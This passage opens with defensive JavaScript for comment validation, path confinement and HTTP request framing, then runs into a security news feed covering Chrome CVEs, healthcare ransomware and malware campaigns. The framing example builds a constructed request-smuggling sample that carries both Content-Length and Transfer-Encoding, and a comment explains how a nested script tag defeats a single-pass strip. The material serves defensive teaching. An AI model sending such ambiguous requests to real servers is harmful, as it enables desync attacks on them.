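    fields[decodeURIComponent(key.replace(/\+/g, " "))] = decodeURIComponent(val.replace(/\+/g, " "));
  }
  return fields;
}

// Why a single-pass strip is not a control: removing "<script>" once from the
// nested form shown on the page reassembles the tag. Kept here only to
// contrast with validateComment; do not use this as a sanitizer.
function stripScriptOnce(s) {
  return s.replace(/<\/?script>/gi, "");
}

// What a /comment handler should do with the raw request body.
function handleCommentBody(rawBody) {
  const result = validateComment(parseFormBody(rawBody).comment);
  return result.ok ? { status: 200, comment: result.value } : { status: 400, reason: result.reason };
}

// ---- CWE-73: the client may name a file, but never choose its directory ----

// Resolve the requested name against the image directory and confirm the
// result still lies inside it. Canonicalisation collapses "../" and
// "....//"-style sequences for us, so there is nothing to pattern-match; NUL
// bytes are refused outright, and only image extensions are served.
function resolveImagePath(webRoot, requested) {
  if (typeof requested !== "string" || requested.includes("\0")) return null;
  const imagesDir = path.resolve(webRoot, "images");
  const full = path.resolve(imagesDir, requested);
  if (!full.startsWith(imagesDir + path.sep)) return null;
  if (!/\.(png|jpe?g|gif)$/i.test(full)) return null;
  return full;
}
```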
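The Content-Length versus Transfer-Encoding disagreement described under CWE-444 above, as an added example that is not part of the HackerOne post: the same bytes are framed by both rules so the leftover-bytes desync is visible, and a strict front-end rule rejects a request that carries both headers instead of forwarding it. Function names and the sample requests are constructed for this example; the trailing request in the ambiguous sample is a harmless GET /status.

```javascript
// Added example (not from the HackerOne post): a small HTTP/1.1 request framer
// that makes the CWE-444 mismatch visible. The same bytes are framed once by
// Content-Length and once by Transfer-Encoding: chunked, and a hardened
// front-end rule refuses any request that carries both headers. Function
// names and sample requests are this example's own; bodies are ASCII, so
// string length equals byte length.
const CRLF = "\r\n";

// Split raw text into the request line, a map of lower-cased header names,
// and whatever follows the blank line. Throws if the head is incomplete.
function parseHead(raw) {
  const end = raw.indexOf(CRLF + CRLF);
  if (end < 0) throw new Error("incomplete head");
  const lines = raw.slice(0, end).split(CRLF);
  const headers = {};
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(":");
    if (colon < 0) throw new Error("malformed header line");
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { requestLine: lines[0], headers, rest: raw.slice(end + 4) };
}

// Content-Length framing: the body is exactly N bytes (CRLFs inside the body
// count, one byte per \r and \n). Anything after it is the next message.
function frameByContentLength(rest, headers) {
  const n = headers["content-length"] === undefined ? 0 : Number(headers["content-length"]);
  if (!Number.isInteger(n) || n < 0) throw new Error("bad Content-Length");
  if (rest.length < n) return { complete: false, body: rest, remaining: "" };
  return { complete: true, body: rest.slice(0, n), remaining: rest.slice(n) };
}

// Chunked framing: hex size, CRLF, that many bytes, CRLF, repeated until a
// size of 0 followed by a final CRLF. Anything after that is the next message.
function frameByChunked(rest) {
  let pos = 0;
  let body = "";
  for (;;) {
    const lineEnd = rest.indexOf(CRLF, pos);
    if (lineEnd < 0) return { complete: false, body, remaining: "" };
    const size = parseInt(rest.slice(pos, lineEnd), 16);
    if (Number.isNaN(size) || size < 0) throw new Error("bad chunk size");
    pos = lineEnd + 2;
    if (size === 0) {
      if (!rest.startsWith(CRLF, pos)) return { complete: false, body, remaining: "" };
      return { complete: true, body, remaining: rest.slice(pos + 2) };
    }
    if (rest.length < pos + size + 2) return { complete: false, body, remaining: "" };
    body += rest.slice(pos, pos + size);
    pos += size + 2;
  }
}

// Frame one request the way a server in the given mode would. "remaining" is
// what that server would treat as the start of the next request.
function frameRequest(raw, mode) {
  const { requestLine, headers, rest } = parseHead(raw);
  const framed = mode === "chunked" ? frameByChunked(rest) : frameByContentLength(rest, headers);
  return { requestLine, ...framed };
}

// Hardened front-end rule: both headers at once is ambiguous by construction,
// so the request is rejected rather than forwarded (RFC 9112 section 6.1
// permits rejecting such requests). Otherwise chunked wins when present.
function frameStrict(raw) {
  const { headers } = parseHead(raw);
  const te = (headers["transfer-encoding"] || "").toLowerCase();
  if ("content-length" in headers && te !== "") {
    return { rejected: true, reason: "both Content-Length and Transfer-Encoding present" };
  }
  if (te !== "" && te !== "chunked") return { rejected: true, reason: "unsupported Transfer-Encoding" };
  return { rejected: false, ...frameRequest(raw, te === "chunked" ? "chunked" : "content-length") };
}

// Content-Length for a body given as lines: the CRLF that joins them is part
// of the count (the chunk size for the same bytes is that count in hex).
function contentLengthFor(bodyLines) {
  return Buffer.byteLength(bodyLines.join(CRLF), "utf8");
}

// Constructed samples (not captured traffic). The first two mirror the page's
// Content-Length and chunked requests; the third carries both headers.
const SAMPLE_CL = ["POST /comment HTTP/1.1", "Host: example.com", "Content-Length: 28", "",
  "comment=X&username=ninjeeter"].join(CRLF);
const SAMPLE_TE = ["POST /comment HTTP/1.1", "Host: example.com", "Transfer-Encoding: chunked", "",
  "1c", "comment=X&username=ninjeeter", "0", ""].join(CRLF) + CRLF;
const TRAILING = ["GET /status HTTP/1.1", "Host: example.com", ""].join(CRLF) + CRLF;
const AMBIGUOUS_BODY = "0" + CRLF + CRLF + TRAILING;
const SAMPLE_BOTH = ["POST /comment HTTP/1.1", "Host: example.com",
  "Content-Length: " + Buffer.byteLength(AMBIGUOUS_BODY), "Transfer-Encoding: chunked", ""].join(CRLF)
  + CRLF + AMBIGUOUS_BODY;

// Both views side by side for a request carrying both headers: a different
// body or different leftover bytes is the desync a defender wants to catch.
function compareFramings(raw) {
  const byCL = frameRequest(raw, "content-length");
  const byTE = frameRequest(raw, "chunked");
  const desync = byCL.body !== byTE.body || byCL.remaining !== byTE.remaining;
  return { desync, byCL, byTE, strict: frameStrict(raw) };
}
```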

by HackerOne

Morphisec highlights the evolution of fake update campaigns and the emergence of CoinLurker—a powerful information stealer written in Go. CoinLurker uses advanced evasion techniques, including in-memory execution, multi-stage obfuscation, and reliance on trusted platforms, making it a formidable threat to individuals and organizations. Fake Update campaigns and delivery tactics CoinLurker builds on the deceptive strategies … The post New Infostealer Malware CoinLurker Used in ‘Fake Update’ Campaigns appeared first on CyberInsider.

by Cyber Insider

With generative artificial intelligence (gen AI) on the frontlines of information security, red teams play an essential role in identifying vulnerabilities that others can overlook. With the average cost of a data breach reaching an all-time high of $4.88 million in 2024, businesses need to know exactly where their vulnerabilities lie. Given the remarkable pace […] The post Testing the limits of generative AI: How red teaming exposes vulnerabilities in AI models appeared first on Security Intelligence.

by Security Intelligence

Overview

On December 16, 2024, the Indian Computer Emergency Response Team (CERT-In) issued a vulnerability note (CIVN-2024-0356) regarding multiple security flaws in Google Chrome for Desktop. These vulnerabilities, rated HIGH in severity, could allow remote attackers to execute malicious code or disrupt the system’s functionality through a Denial of Service (DoS) attack.

Affected Software Versions

These vulnerabilities impact the following versions of Google Chrome for Desktop:

- Windows and macOS: Versions prior to 131.0.6778.139/.140 and 131.0.6778.108/.109.
- Linux: Versions prior to 131.0.6778.139 and 131.0.6778.108.

All end-user organizations and individuals using Google Chrome for Desktop are urged to update their browsers immediately to prevent potential exploits.

Impact of the Vulnerabilities

The identified vulnerabilities can lead to the following risks:

- Remote Code Execution: A remote attacker could execute arbitrary code on a target system using a maliciously crafted webpage.
- Denial of Service (DoS): Attackers can crash the browser or make it unresponsive, causing system instability.
- Sensitive Information Disclosure: Exploitation may allow access to sensitive information stored in the browser.

Detailed Description of the Vulnerabilities

Google Chrome, a widely used web browser across Windows, macOS, and Linux systems, is vulnerable to specific flaws caused by improper handling of memory during certain operations. Below is a breakdown of the vulnerabilities:

1. CVE-2024-12381: Type Confusion in V8
Severity: High
Description: The V8 JavaScript engine, used by Google Chrome to process web content, has a Type Confusion issue. Type Confusion occurs when the browser misinterprets the type of an object, leading to unexpected behavior. This flaw can result in heap corruption when a specially crafted HTML page is executed.
Reported by: Seunghyun Lee (@0x10n) on December 2, 2024.
Affected Versions: Google Chrome prior to version 131.0.6778.139/.140.

2. CVE-2024-12382: Use After Free in Translate
Severity: High
Description: A Use After Free vulnerability exists in Google Chrome’s Translate component. Use After Free occurs when memory is accessed after it has been freed, leading to unexpected behavior or crashes. Exploiting this vulnerability via a crafted HTML page can cause heap corruption or allow remote code execution.
Reported by: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group on November 18, 2024.
Affected Versions: Google Chrome prior to version 131.0.6778.139/.140.

3. CVE-2024-12053: Type Confusion in V8
Severity: High
Description: Another Type Confusion vulnerability in the V8 engine impacts earlier versions of Google Chrome. Exploitation through a malicious HTML page can result in object corruption, potentially leading to system compromise.
Reported by: gal1ium and chluo on November 14, 2024.
Affected Versions: Google Chrome prior to version 131.0.6778.108/.109.

How Can These Vulnerabilities Be Exploited?

Attackers can take advantage of these vulnerabilities by luring users to visit a specially crafted webpage. Once the webpage is loaded, it can trigger the security flaws, allowing the attacker to:

- Execute malicious code remotely on the target system.
- Corrupt memory, causing the browser to crash.
- Steal sensitive data or compromise system functionality.

Given the widespread use of Google Chrome, it is critical to address these vulnerabilities immediately.

Solution: Update Google Chrome Immediately

Google has addressed these vulnerabilities by releasing updated versions of Chrome for Desktop on the Stable Channel. The updates are being rolled out gradually, and all users are advised to apply them as soon as possible.

Updated Versions

- Windows and macOS: Version 131.0.6778.139/.140
- Linux: Version 131.0.6778.139

To update Google Chrome:

1. Open Google Chrome.
2. Click on the three dots (Menu) in the top-right corner.
3. Navigate to Help > About Google Chrome.
4. Chrome will automatically check for updates and install the latest version.
5. Restart the browser to apply the update.

Security Fixes and Acknowledgements

Google has credited several external security researchers for identifying and reporting these vulnerabilities:

- CVE-2024-12381: Seunghyun Lee (@0x10n) – Awarded $55,000 for discovering the issue.
- CVE-2024-12382: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group.
- CVE-2024-12053: gal1ium and chluo – Awarded $8,000 for identifying the flaw.

In addition to contributions from external researchers, Google’s internal security teams continue to conduct audits, fuzzing, and other security initiatives to proactively identify and fix vulnerabilities.

Why Prompt Updates Are Crucial

- Rapid Threat Exploitation: Attackers often exploit known vulnerabilities within days of disclosure. Delaying updates leaves systems vulnerable.
- Prevention of Data Breaches: Remote code execution could allow attackers to access sensitive data, including saved passwords and browsing history.
- System Stability: Updating ensures that your browser runs smoothly without crashes caused by these vulnerabilities.

Best Practices for Safe Browsing

In addition to updating Google Chrome, here are some best practices to stay secure:

- Enable Automatic Updates: Keep your browser and software up to date.
- Use Security Extensions: Install reliable security extensions to block malicious content.
- Avoid Suspicious Links: Do not click on unknown or untrusted links in emails or messages.
- Enable Site Isolation: Chrome’s Site Isolation feature helps contain exploits.
- Regular Security Scans: Use antivirus software to detect and prevent malicious activity.
- Check Permissions: Regularly review website permissions (e.g., camera, microphone) to limit exposure.

Conclusion

The multiple vulnerabilities identified in Google Chrome highlight the importance of timely software updates to ensure system security and stability. The flaws – primarily Type Confusion in V8 and Use After Free in Translate – can be exploited by attackers to execute arbitrary code, cause system crashes, or steal sensitive data. All users of Google Chrome for Desktop are urged to update their browsers to the latest stable version (131.0.6778.139/.140) without delay. By applying updates and following safe browsing practices, users can significantly reduce the risk of cyberattacks and ensure a secure online experience.

At Cyble, we remain committed to helping organizations stay ahead of evolving cyber threats through continuous threat monitoring and actionable intelligence. Stay informed, stay secure. Schedule a demo today to see how Cyble can safeguard your systems against emerging vulnerabilities and cyber threats.

Source:

- https://www.cert-in.org.in/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12382
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12053
- https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_10.html
- https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12381

The post Multiple Vulnerabilities in Google Chrome for Desktop: Update to Stay Secure appeared first on Cyble.

by CYBLE

This is a walkthrough of a Linux fundamentals Section in HTB Academy. It is recommended that you do the module in HTB Academy to… Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have medium membership, you can access the blog here: https://viscid.substack.com/p/picoctf-2024-webdecode-3801d825f803 Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have medium membership, you can access the blog here: https://viscid.substack.com/p/advent-of-cyber-2024-day-2-soc-analysts Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have a medium membership, you can access the blog here… Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have a medium membership, you can access the blog here… Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

2024-12-17 13:21:11

Openvpn for Tryhackme or HTB

If you don’t have a medium membership, you can access the blog here… Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Dive into the ultimate guide for automotive penetration testing. Discover the critical steps and measures to enhance vehicular… Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas! Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

It came without buffering! It came without lag! Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

The university's incident website blocks search engines from listing the site, making it more difficult for affected individuals to find the website in search results. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

From cyber attacks across the geopolitical landscapes, to product updates that help small businesses, Sophos was there in 2024.

by Sophos News

A little-known cyber espionage actor known as The Mask has been linked to a new set of attacks targeting an unnamed organization in Latin America twice in 2019 and 2022. "The Mask APT is a legendary threat actor that has been performing highly sophisticated attacks since at least 2007," Kaspersky researchers Georgy Kucherin and Marc Rivero said in an analysis published last week. "Their targets

by The Hacker News

The marketing of illegal drugs on open platforms is “gaining prominence,” authorities note, while the number of drug transactions on the dark web has decreased in recent years.

by WIRED Security News

Experts say the catchall term for online fraud furthers harm against victims and could dissuade people from reporting attempts to bilk them out of their money.

by WIRED Security News

We're sharing top 5 cryptographic key protection best practices. The post Top 5 Cryptographic Key Protection Best Practices appeared first on Zimperium.

by Zimperium

Broadcom's shares have skyrocketed 38% post-earnings, fueled by AI market optimism. However, sustaining this trajectory hinges on delivering on ambitious growth projections.

by ITPro Today

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of flaws is below - CVE-2024-20767 (CVSS score: 7.4) - Adobe ColdFusion contains an improper access control vulnerability that could allow an attacker to access or modify restricted

by The Hacker News

Prioritizing a security-first approach and robust data governance can help organizations harness AI's potential while safeguarding sensitive information.

by ITPro Today

SandboxAQ, a leading technology company, has achieved significant milestones in cybersecurity research and development. The company’s dedicated team has made substantial contributions to the field, particularly in post-quantum cryptography (PQC). In 2024 alone, SandboxAQ has published 18 peer-reviewed papers, bringing the total number of cybersecurity publications since its spin-off from Alphabet in 2022 to 45. […] The post SandboxAQ Advances Global Cybersecurity Through Series of Milestones appeared first on IT Security Guru.

by IT Security Guru

Cybercriminals are exploiting Microsoft Teams to deceive users into installing remote access tools, granting attackers control over victims' systems. The post Hackers exploiting Microsoft Teams to gain remote access to user’s system appeared first on ZENDATA Cybersecurity.

by Zendata

A PagerDuty study finds that 88% of global executives anticipate major IT disruptions in 2025, highlighting widespread concerns about operational resilience.

by ITPro Today

The proposed legislation comes amid a surge in ransomware and state-linked attacks against U.S. water utilities.

by Cybersecurity Dive

As another year comes to an end, it’s not only Santa who brings presents for those on his nice list. These days, it’s quite common for well-known firms to publish their annual roundups of the most notable events that have taken place in the cybersecurity landscape, together with predictions of what can we expect in […] The post Top three cyber threats that will persist in 2025 appeared first on Outpost24.

by Outpost24

by ComputerWeekly

by ComputerWeekly

The federal agency’s efforts to improve defenses surged in fiscal year 2024. Yet, attacks continue to climb.

by Cybersecurity Dive

Mamont banker is distributed under the guise of an application for tracking the delivery of goods offered at wholesale prices.

by Kaspersky

2024 was a difficult year for healthcare cybersecurity, but there are some hopeful signs heading into 2025, with effective controls and new rules coming.

According to the healthcare cybersecurity trends of 2024, healthcare cyber defenses came under attack like never before, with headline-grabbing ransomware and other cyberattacks endangering patient safety and privacy alike. Change Healthcare, Ascension and NHS London were some of the biggest victims in 2024, but hundreds of smaller healthcare organizations suffered too, and there were likely additional attacks that were never confirmed. Governments and private organizations alike struggled to find solutions, and while there was some progress to cheer, the data on healthcare cybersecurity continues to paint a challenging picture for the critical sector.

We’ll look at the year in healthcare cybersecurity – including some good news – and what may be in store for 2025.

Ransomware Attacks on Hospitals in 2024: A Global Trend

A little more than four years ago, ransomware groups pledged that they wouldn’t attack healthcare infrastructure during the COVID-19 pandemic. How times have changed. 2024 saw an increase both in the number and severity of healthcare ransomware attacks, with some attacks limiting patient care for weeks and resulting in huge cleanup costs. Here are some of the year’s biggest healthcare cyberattacks.

Change Healthcare set the tone for the year in February, with a ransomware attack that resulted in the theft of the insurance and healthcare records of more than 100 million Americans. The breach, attributed to a lack of multifactor authentication (MFA) on a legacy server, may eventually cost parent company UnitedHealth Group nearly $3 billion and pushed cybersecurity onto the pages of the prestigious Journal of the American Medical Association (JAMA). Change Healthcare made at least one ransom payment after the attack, which didn’t prevent the data from being leaked while simultaneously increasing the attractiveness of the healthcare sector as a target for cybercriminals.

Also in February, the Cencora data breach affected more than a dozen pharmaceutical companies, including Johnson and Johnson.

Ascension Healthcare was another major target, hit by a ransomware attack in May that led to chaos and disruption at some of the 140 hospitals the company oversees. The breach demonstrated how dangerous ransomware attacks on hospitals in 2024 can be, as it reportedly led to lapses in patient care.

In June, NHS London hospitals became a case study in how ill-prepared healthcare systems may be to carry out the backup processes that a ransomware attack can impose, as an attack on lab services provider Synnovis resulted in a 96% drop in blood tests.

Plenty of smaller healthcare cyberattacks were just as disruptive to the communities they serve. One of the most alarming incidents was a ransomware attack that caused patients to be diverted from the University Medical Center (UMC) Health System in Lubbock, Texas – the only Level 1 trauma center within 400 miles. Other healthcare cyberattacks that posed dire threats to patient care or privacy included the non-profit blood center OneBlood, Boston Children’s Health Physicians, and Planned Parenthood.

U.S. Leads in Healthcare Ransomware Attacks

The U.S. remains the biggest target for cyberattacks in general, and healthcare is no exception. Of 339 healthcare ransomware attacks recorded by Cyble threat intelligence researchers as of early December, 251 hit U.S. organizations. Globally, ransomware attacks on healthcare organizations were up 27% in the first 11 months of 2024 compared to the same period of 2023. An additional 62 attacks targeting the pharmaceutical and biotech sector have pushed the total number of global healthcare-related ransomware attacks above 400 with a few weeks left in the year. Put another way, healthcare ransomware attacks have occurred at a rate of more than one a day in 2024.

Ransomware attacks on U.S. healthcare organizations have been up 36% this year, but one of the overlooked aspects of these attacks is the medical device security challenges that make the healthcare sector an even more attractive target for cybercriminals.

But the big “winner,” if you will, has been the UK, which saw just two healthcare ransomware attacks in 2023 and has already been hit 16 times this year, an increase of 700%. Canada, Germany and Australia round out the top five (image below).

LockBit was the top ransomware group hitting the healthcare sector in 2024, but the group’s activity has declined amid enforcement actions, and RansomHub may take over the top spot by year’s end. INC, BianLian and Everest round out the top five (image below).

Overall, healthcare was the third most frequently targeted sector by ransomware groups of the more than 20 sectors tracked by Cyble, with professional services and construction the only sectors experiencing more ransomware attacks.

Healthcare Cybersecurity Breaches on the Dark Web

Another data point showing a dramatic increase in healthcare cybersecurity incidents can be found in the data and credentials for sale on the dark web. Cyble researchers have documented 181 credible healthcare claims by threat actors and cybercriminals on the dark web, and an additional 36 targeting pharmaceutical and biotech organizations. That’s already more than 50% higher than the 140 dark web claims documented by Cyble across both sectors in all of 2023.

Healthcare data is particularly valuable for cybercriminals because no other personally identifiable information (PII) reveals as much as healthcare data, which can include a patient’s medical conditions and diagnoses in addition to other identifying factors.

As healthcare organizations increasingly rely on cloud infrastructure, cloud security in healthcare IT has become an essential focus for securing sensitive data and preventing breaches on these platforms. Dark web monitoring becomes especially important in this context, as cloud environments can be a prime target for cybercriminals seeking to exploit vulnerabilities.

Dark web monitoring is an important practice for healthcare firms to adopt: they can detect data leaks faster and – equally important – also detect when credentials like usernames and passwords leak onto the dark web, which is the most common initial attack vector in breaches, according to IBM-Ponemon.

Good News: Cost of a Healthcare Data Breach Drops

One bit of good news is that the annual IBM-Ponemon Cost of a Data Breach report found that the average cost of a healthcare data breach dropped by more than $1 million this year, from $10.93 million to $9.77 million per incident. However, that’s still double the average cost of a data breach, and 60% higher than the second-place financial services sector, as healthcare’s unique cybersecurity and data protection challenges make incident response and cleanup extremely difficult.

Image: IBM-Ponemon Cost of a Data Breach by sector

The good news in that data is that healthcare cybersecurity may actually be improving. The report also found that AI and automation technologies in particular had a pronounced benefit, with the most sophisticated users across all sectors saving an average of $2.2 million per breach. Other positive factors include initial detection by internal tools and teams (rather than hearing from third parties or attackers), and bringing in law enforcement in ransomware cases, which saved nearly $1 million per incident.

The security tools that most lowered the cost of breaches were:

- Employee training
- AI- and machine learning-driven insights
- SIEM systems
- Incident response planning
- Encryption
- Threat intelligence

Of those tools, encryption is a particularly relevant one for the healthcare industry, as 98% of medical IoT device traffic is unencrypted.

Medical IoT Devices: Healthcare’s Unique Achilles Heel

A recent Cyble report looked at the unique challenges of medical internet of things (IoT) devices, which is another factor contributing to the sector’s uniquely difficult cybersecurity challenges. Among the issues plaguing internet of medical things (IoMT) devices are:

- Device Exposure: Over 50% of hospital IoT devices are vulnerable to attack.
- Unpatched Security Flaws in Infusion Pumps: 75% of infusion pumps have unpatched security flaws.
- Unsupported Operating Systems in Medical Imaging Systems: 83% of medical imaging systems run on unsupported operating systems.
- Unencrypted Network Traffic: 98% of IoMT device network traffic is unencrypted.
- Connected Device Breaches: 88% of healthcare organizations experienced at least one data breach in the past two years due to a vulnerability in a connected device.

CISA, the U.S. Cybersecurity and Infrastructure Security Agency, has issued 11 alerts so far this year warning about vulnerabilities in medical industrial control system (ICS) devices.

Users should patch or replace vulnerable devices whenever it’s possible to do so. And to the extent possible, medical devices should not be exposed to the internet and should be firewalled and segmented from other networks.

What Can Be Done to Improve Healthcare Cybersecurity?

In the U.S., the incoming administration of Donald J.
Trump is expected to have an anti-regulatory bias, but healthcare cybersecurity may be one area of surprising agreement between Democrats and Republicans.  There have been a number of bipartisan bills introduced to improve healthcare cybersecurity, the most recently introduced just last month. That’s too late for action in the current Congress, but with the 119th Congress set to begin in January, it signals that healthcare cybersecurity may see some movement in the next Congress.  One promising approach to addressing healthcare cybersecurity challenges is the zero trust adoption in healthcare, which could drastically improve the sector’s defenses. Zero trust principles focus on the idea of never trusting, always verifying, and it can be particularly effective in environments where the network perimeter is no longer easily defined, as in healthcare.  Following a recent GAO report that documented a lack of progress by the Department of Health and Human Services (HHS) in ensuring the security of the healthcare sector – and with a soon-to-be-published HHS proposal that would add new cybersecurity requirements to the HIPAA Security Rule – there appears to be promising consensus around the need for better healthcare security standards in the U.S.  With initiatives also underway in the UK, NIS2 in the EU, the Australia Cyber Security Act, and other places, 2025 could become a turning point for the better for critical infrastructure security in general. 

by The Cyber Express

The Mamont banking trojan is spreading under the guise of a parcel-tracking app for fake stores claiming to offer goods at wholesale prices.

by Securelist

From Oct to early Dec 2024, our customers observed nearly twice as many fake CAPTCHA websites compared to September, likely the result of researchers releasing the templates used for these campaigns.

by ReliaQuest

In 2023, Bishop Fox reengineered Cosmos to give security teams the speed, scale, and flexibility needed to tackle growing attack surface challenges.

by Bishop Fox

2024-12-17 00:00:00

Top 10 Blogs of 2024

At TrustedSec, we are all about leveraging our collective intelligence and knowledge to uplift the cybersecurity community. One of our most popular educational outlets is The Security Blog, where our experts divulge…

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Avalanche. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-37373.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft PC Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

LDAP RCE 😵, worst.fit (@orange_8361 + @_splitline_) Grok AI vulns (@wunderwuzzi23), automating exploits (@FuzzySec + @chompie1337), and more!

by Bad Sector Labs

Vulnerabilities in Microsoft Azure Data Factory's integration with Apache Airflow can lead to unauthorized access and control over cloud resources. The post Dirty DAG: New Vulnerabilities in Azure Data Factory's Apache Airflow Integration appeared first on Unit 42.

by Palo Alto Networks - Unit42

Arctic Wolf plans to integrate Cylance's endpoint detection and response (EDR) technology into its extended detection and response (XDR) platform.

by Dark Reading

In this post we explore integrated cloud email security (ICES), how it works, and why it is a core component of cybersecurity.

by Barracuda

Artificial intelligence capabilities are coming to a desktop near you — with Microsoft 365 Copilot, Google Gemini with Project Jarvis, and Apple Intelligence all arriving (or having arrived). But what are the risks?

by Dark Reading

While low-code/no-code tools can speed up application development, sometimes it's worth taking a slower approach for a safer product.

by Dark Reading

Cybersecurity researchers have shed light on a previously undocumented aspect associated with ClickFix-style attacks that hinge on taking advantage of a single ad network service as part of a malvertising-driven information stealer campaign dubbed DeceptionAds. "Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over

by The Hacker News

The hackers stole names, phone numbers, dates of birth and information related to health conditions, treatments and prescriptions. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Security keys are excellent physical security solutions for protecting your online accounts. We tested the best security keys that combine safety, affordability, and convenience.

by ZDNET Security

The sector must prioritize comprehensive data protection strategies to safeguard PII in an aggressive threat environment.

by Dark Reading

A Serbian journalist had his phone first unlocked by a Cellebrite tool and subsequently compromised by a previously undocumented spyware codenamed NoviSpy, according to a new report published by Amnesty International. "NoviSpy allows for capturing sensitive personal data from a target's phone after infection and provides the ability to turn on the phone's microphone or camera remotely," the

by The Hacker News

Summary Four major Chinese state-sponsored Advanced Persistent Threat (APT) groups, Volt Typhoon, Salt Typhoon, Flax Typhoon, and Brass Typhoon, are targeting global critical infrastructure and network devices as part of coordinated cyber espionage campaigns. These groups exploit vulnerabilities in network appliances, IoT devices, and software supply chains to maintain persistent access and exfiltrate sensitive data. Their tactics include living-off-the-land...

by RH-ISAC

This past week has been packed with unsettling developments in the world of cybersecurity. From silent but serious attacks on popular business tools to unexpected flaws lurking in everyday devices, there’s a lot that might have flown under your radar. Attackers are adapting old tricks, uncovering new ones, and targeting systems both large and small. Meanwhile, law enforcement has scored wins

by The Hacker News

Task scams are a new type of scam in which victims are slowly tricked into paying in order to get paid for repetitive, simple tasks.

by Malwarebytes Labs

The most common way of preventing cross-site request forgery attacks is to use an anti-CSRF token, which is a unique value set and then verified by a web app. CSRF is a client-side attack that can be used to perform unintended actions within a user session, including redirecting to a malicious website or stealing session data. Correctly generating and using CSRF tokens is crucial to protect users against CSRF attacks and their consequences. The post How to prevent CSRF attacks by using anti-CSRF tokens appeared first on Invicti.

by Invicti

Whether you want to disguise your IP address to improve your privacy at college or bypass school blocks to access educational resources, these are the best school VPNs.

by ZDNET Security

Explore industry moves and significant changes in the industry for the week of December 16, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

The company's spyware, dubbed Graphite, is capable of hacking phones and stealing private communications. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

This week on the Lock and Code podcast, we speak with Ron de Jesus about the work of achieving user privacy while balancing company goals.

by Malwarebytes Labs

With the evolution of modern software development, CI/CD pipeline governance has emerged as a critical factor in maintaining both agility and compliance. As we enter the age of artificial intelligence (AI), the importance of robust pipeline governance has only intensified. With that said, we'll explore the concept of CI/CD pipeline governance and why it's vital, especially as AI becomes

by The Hacker News

Arctic Wolf has acquired Cylance, BlackBerry’s beleaguered cybersecurity business, for $160 million — a significant discount from the $1.4 billion BlackBerry paid to acquire the startup in 2018. Under the terms of the deal, which is expected to close in BlackBerry’s fiscal Q4, BlackBerry will sell its Cylance assets to Arctic Wolf for $160 million […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cybersecurity researchers are calling attention to a new kind of investment scam that leverages a combination of social media malvertising, company-branded posts, and artificial intelligence (AI) powered video testimonials featuring famous personalities, ultimately leading to financial and data loss. "The main goal of the fraudsters is to lead victims to phishing websites and forms that harvest

by The Hacker News

New terminal on the block: Ghostty, Neovim tutorial series, Docker fundamentals for hackers, and the Four Quarters productivity method. Recent buzz includes Meta's Llama 3.3 70B model launch and critical findings in Android security vulnerabilities.

by Hive Five

Cybersecurity researchers have discovered a new PHP-based backdoor called Glutton that has been put to use in cyber attacks targeting China, the United States, Cambodia, Pakistan, and South Africa. QiAnXin XLab, which discovered the malicious activity in late April 2024, attributed the previously unknown malware with moderate confidence to the prolific Chinese nation-state group tracked as Winnti (

by The Hacker News

Next year, health IT leaders must prioritize areas such as precision medicine, cyber resilience, and health equity in AI, experts say.

by ITPro Today

Security Information and Event Management systems are vital for businesses’ cybersecurity. They collect and analyze security alerts, protecting against threats. Modern cyber threats outpace legacy SIEM systems. This exposes a critical weakness in your digital defenses. These outdated tools struggle to defend against sophisticated cyberattacks. The solution lies in new technologies built for today’s complex […] The post Why It’s Time to Replace Your Legacy SIEM and What to Consider as a Replacement? appeared first on IT Security Guru.

by IT Security Guru

Check Point Software, a global leader in cybersecurity solutions, today announced a leadership transition. Gil Shwed, the company’s founder and current CEO, will assume the role of Executive Chairman. Nadav Zafrir, a seasoned cybersecurity veteran, will step into the CEO position, effective immediately. “Check Point embarks on a new chapter, with my transition into my […] The post Nadav Zafrir Becomes CEO at Check Point Software appeared first on IT Security Guru.

by IT Security Guru

Every day, a renowned hospital serves the needs of over a million patients, delivering not only world-class care but also hope for healthier futures. But behind the scenes, the hospital’s small but mighty security team was feeling the strain. With two hospital campuses, multiple regional centers, and more than 50 care locations, the pressure to […] The post Lessons From the Field: How a Hospital Turned Cyber Challenges Into a Success Story  appeared first on Binary Defense.

by Binary Defense

Internationalization and localization require more than translation: tone, images, date/time and number formatting, among other items, need to be considered.

by Cloudflare

